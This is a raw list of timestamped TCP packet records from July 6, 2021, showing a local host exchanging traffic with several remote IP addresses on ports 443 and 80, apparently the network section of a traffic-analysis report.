Jul 6, 2021 14:30:44.049323082 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049335957 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049340963 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049375057 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049386978 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049416065 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049416065 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049454927 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049459934 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049499035 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049504995 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049540043 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049551964 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049575090 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049586058 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049616098 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.051521063 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.051598072 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.074641943 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.075373888 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.075421095 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.075454950 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.075459957 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.075485945 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.075639009 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.078222036 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.078275919 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.078315973 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.078349113 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.078352928 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.078392982 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.078397036 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.078892946 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.079277992 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.079499960 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.083154917 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.088304043 CEST	443	49864	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.089066029 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.090179920 CEST	443	49864	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.090243101 CEST	443	49864	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.090274096 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.090290070 CEST	443	49864	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.090315104 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.090329885 CEST	443	49865	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.090333939 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.091392040 CEST	443	49865	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.091432095 CEST	443	49865	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.091450930 CEST	443	49865	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.091511011 CEST	49865	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.092863083 CEST	49865	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.093528032 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.094094992 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.096875906 CEST	49865	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.099361897 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.099406958 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121233940 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121267080 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121285915 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121301889 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121316910 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121342897 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121366024 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121385098 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121402979 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121423960 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121443987 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121464014 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121481895 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121500015 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121516943 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.121529102 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.121562958 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.121567011 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.121568918 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.123765945 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.123794079 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.123811007 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.123888016 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.124064922 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.124074936 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.124084949 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.124212980 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.124224901 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.127285004 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.127310991 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.128109932 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.128128052 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.128262043 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.128281116 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.128297091 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.128331900 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.128364086 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.133507013 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.135171890 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.135247946 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.136595011 CEST	443	49864	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.136622906 CEST	443	49864	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.138943911 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.139389992 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.139401913 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.139444113 CEST	443	49865	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.139511108 CEST	49865	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.150703907 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.183346987 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.195628881 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:45.702332020 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:45.702517986 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:45.702717066 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:45.702769995 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:45.702826977 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:45.702866077 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:45.702933073 CEST	49865	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:45.702944040 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:49.528038979 CEST	49867	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.528160095 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.567800999 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.569504976 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.570081949 CEST	80	49867	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.570183992 CEST	49867	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.579442024 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.619266033 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649101973 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649135113 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649157047 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649182081 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649204969 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649224043 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649244070 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649261951 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649282932 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649302959 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.649985075 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.688613892 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.688656092 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.688680887 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.688697100 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.688700914 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.688721895 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.688743114 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.688755035 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.688762903 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.688782930 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.688813925 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.688848972 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.689569950 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689591885 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689609051 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689625025 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689642906 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689660072 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689673901 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689688921 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689703941 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689719915 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689734936 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.689752102 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.690577030 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.729581118 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729722023 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729799032 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729825020 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729847908 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729867935 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729888916 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729890108 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.729909897 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729932070 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729958057 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729979038 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.729994059 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730000019 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730000973 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.730003119 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730005980 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730024099 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.730045080 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.730063915 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.730083942 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.730094910 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730099916 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730421066 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730433941 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730437040 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730439901 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.730942965 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.730969906 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.730990887 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731012106 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731031895 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731059074 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731081963 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731102943 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731139898 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731164932 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731185913 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731205940 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.731106997 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732237101 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732242107 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732244968 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732247114 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732249975 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732253075 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732254982 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732256889 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.732847929 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.732904911 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.732924938 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.732948065 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.732969046 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.732989073 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.733009100 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.733030081 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.733053923 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.733073950 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.733093977 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.733115911 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.733115911 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.733128071 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.733130932 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.733133078 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.733134985 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.733161926 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.770916939 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.770948887 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.770976067 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.770998955 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771020889 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771044016 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771065950 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771089077 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771123886 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771167040 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771188974 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771210909 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771233082 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771254063 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771266937 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771281004 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771300077 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771305084 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771327972 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771347046 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771348953 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771372080 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771380901 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771394968 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771416903 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771428108 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771440029 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771451950 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771465063 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771487951 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771497965 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771511078 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771533012 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771543026 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771555901 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771560907 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771578074 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771600008 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771609068 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771624088 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771648884 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771671057 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771672010 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771693945 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771714926 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771728039 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771737099 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771758080 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771764040 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771780968 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771797895 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771805048 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771831036 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771840096 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771855116 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771878004 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771888971 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771900892 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.771928072 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.771956921 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.772351027 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.772376060 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.772392988 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.772433043 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.772454977 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.772761106 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.772788048 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.772810936 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.772862911 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.772875071 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.772927046 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773010969 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.773057938 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773082018 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773104906 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773122072 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773127079 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.773139000 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.773143053 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773164988 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773180962 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.773185968 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773207903 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773227930 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773248911 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773288965 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773302078 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.773310900 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773333073 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773354053 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773375988 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773391962 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773392916 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.773415089 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773436069 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773458004 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773483992 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773508072 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773509026 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.773530960 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773551941 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773576021 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773598909 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773619890 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773641109 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773663044 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773690939 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.773744106 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.773883104 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.811816931 CEST	80	49866	45.90.58.179	192.168.2.4
